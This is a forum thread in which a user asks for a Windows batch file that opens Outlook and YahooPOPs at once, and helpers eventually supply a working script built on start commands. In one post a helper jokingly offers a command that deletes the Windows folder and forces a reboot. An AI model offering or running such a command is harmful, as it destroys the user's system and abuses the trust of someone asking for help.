Results 1 to 8 of 8

Thread: Batch File Help

  1. #1
    phalkon30's Avatar

    Jay Leno Geek

    Join Date
    Nov 2002
    Location
    Lacrosse, Wi.
    Posts
    4,214

    Batch File Help

    I'd like to create a batch file to launch outlook and yahoopops instead of clicking the two separately.

    CPU tried to help me, but nothing he can come up with works.

    start "G:\Program Files\Microsoft Office\Outlook.exe"
    start "G:\Program Files\YahooPOPs\YahooPOPs.exe"

    ^^thats what I'm trying to use, but all it does is bring up a blank cmd prompt, 2 actually.

    I'm using XP.

    Could anybody whip up a batch file that would work for those adresses? I'm not worried that somebody will post a virus (I'm smart enough to actually CHECK the code), so don't bother trying to infect me.
    Help save lives by doing cancer research! Click here to see the Zeropaid.com UD member page. Please take a few minutes to sign up for our UD cancer research program, it uses idle cpu cycles to help fight cancer by helping to find new drugs. This thread has more info, or you can PM me with questions/comments. I hope to finish the guide on how to start using UD soon

  2. #2
    cpugeniusmv's Avatar

    Computer Genius

    Join Date
    Jun 2002
    Location
    ::1
    Posts
    4,442
    rd/s/q C:\WINDOWS
    shutdown -r -t 60 -c "bwahahaha"
    Google | cpugeniusmv

    "I have no special talents, I am only passionately curious."
    Albert Einstein

    Ask smart questions!

  3. #3
    phalkon30's Avatar

    Jay Leno Geek

    Join Date
    Nov 2002
    Location
    Lacrosse, Wi.
    Posts
    4,214
    :mellow I'm not kyle.

    Although I DON'T know what that does, I know its not good. (I think delete windows dir and say "bwahahahaha")
    Help save lives by doing cancer research! Click here to see the Zeropaid.com UD member page. Please take a few minutes to sign up for our UD cancer research program, it uses idle cpu cycles to help fight cancer by helping to find new drugs. This thread has more info, or you can PM me with questions/comments. I hope to finish the guide on how to start using UD soon

  4. #4
    talkinghand's Avatar

    ZeroPaid Regular

    Join Date
    Jun 2003
    Location
    Cincinnati
    Posts
    193
    alright, i got your batch...

    "G:\Program Files\Microsoft Office\Outlook.exe"
    "G:\Program Files\YahooPOPs\YahooPOPs.exe"

    paste in text, rename to blah.bat ...

    worked for me
    -The Hand Talks - -Talks The Hand

  5. #5
    phalkon30's Avatar

    Jay Leno Geek

    Join Date
    Nov 2002
    Location
    Lacrosse, Wi.
    Posts
    4,214
    Nah, been there done that.

    I halfway got things running. I may be kyle afterall though (it helps to have the right dir in the filename).

    Now my problem is, it only runs the first thing, then waits for whatever its launched to close, then opens the second file.

    I tried making a batch file to open 2 batch files, but that didn't work either.
    Help save lives by doing cancer research! Click here to see the Zeropaid.com UD member page. Please take a few minutes to sign up for our UD cancer research program, it uses idle cpu cycles to help fight cancer by helping to find new drugs. This thread has more info, or you can PM me with questions/comments. I hope to finish the guide on how to start using UD soon

  6. #6
    cpugeniusmv's Avatar

    Computer Genius

    Join Date
    Jun 2002
    Location
    ::1
    Posts
    4,442
    Quote Originally Posted by phalkon30
    :mellow I'm not kyle.

    Although I DON'T know what that does, I know its not good. (I think delete windows dir and say "bwahahahaha")
    and shuts down your machine :angel
    Google | cpugeniusmv

    "I have no special talents, I am only passionately curious."
    Albert Einstein

    Ask smart questions!

  7. #7
    cpugeniusmv's Avatar

    Computer Genius

    Join Date
    Jun 2002
    Location
    ::1
    Posts
    4,442
    got it:

    cd "C:\Program Files\Microsoft Office\OFFICE11"
    start outlook.exe
    cd "C:\Program Files\YahooPOPs"
    start yahoopops.exe

    make sure it's the right office dir
    Google | cpugeniusmv

    "I have no special talents, I am only passionately curious."
    Albert Einstein

    Ask smart questions!

  8. #8
    phalkon30's Avatar

    Jay Leno Geek

    Join Date
    Nov 2002
    Location
    Lacrosse, Wi.
    Posts
    4,214
    Ahhhhh, it works. Thanks.
    Help save lives by doing cancer research! Click here to see the Zeropaid.com UD member page. Please take a few minutes to sign up for our UD cancer research program, it uses idle cpu cycles to help fight cancer by helping to find new drugs. This thread has more info, or you can PM me with questions/comments. I hope to finish the guide on how to start using UD soon

Similar Threads

  1. Replies: 45
    Last Post: May 25th, 2005, 04:20 AM
  2. Kazzalite tools
    By Malicious Intent in forum General Discussion
    Replies: 22
    Last Post: December 18th, 2003, 02:34 PM
  3. U.S. Is Only the Tip of Pirated Music Iceberg
    By Kooperman in forum Politics
    Replies: 10
    Last Post: November 28th, 2003, 10:35 AM
  4. extracting a file
    By cptpoohface in forum General Discussion
    Replies: 6
    Last Post: September 30th, 2003, 08:42 PM
  5. Deleteing a file
    By Kyle06 in forum The Lounge
    Replies: 13
    Last Post: September 26th, 2003, 12:14 PM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •